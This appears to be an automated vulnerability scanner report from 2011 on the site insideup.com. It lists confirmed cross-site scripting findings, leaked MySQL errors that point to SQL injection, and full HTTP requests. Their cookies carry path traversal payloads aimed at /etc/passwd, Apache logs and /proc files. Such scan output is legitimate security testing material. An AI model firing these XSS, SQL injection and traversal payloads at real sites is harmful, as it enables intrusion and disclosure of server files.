prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000542)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E

/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00050F)</script>

Request

GET /ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00050F)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bbbvqbpg7vhm99en4nklktb935; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00050F)</script>/' union select prj.catI' at line 5
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST '"--></style></script><script>alert(0x000509)</script>

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000509)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:20 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D0030714F0C8C0E9F8ADA5D143BA6D35; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="'"--></style></script><script>netsparker(0x000509)</script>"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E

/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000519)</script>

Request

GET /ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000519)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 